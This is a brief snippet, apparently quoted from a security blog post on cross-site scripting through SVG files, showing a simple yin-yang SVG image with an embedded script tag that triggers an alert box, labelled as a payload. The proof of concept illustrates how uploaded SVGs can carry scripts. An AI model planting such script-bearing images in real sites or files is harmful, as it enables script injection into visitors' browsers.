only a payload
1
2
3
4
5
6
7
| <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
<circle cx="50" cy="50" r="48" fill="none" stroke="#000"/>
<path d="M50,2a48,48 0 1 1 0,96a24 24 0 1 1 0-48a24 24 0 1 0 0-48"/>
<circle cx="50" cy="26" r="6"/>
<circle cx="50" cy="74" r="6" fill="#FFF"/>
***<script>alert("XSS through SVG");</script>***
</svg>
|
引用:
https://netsec.expert/posts/xss-through-svg/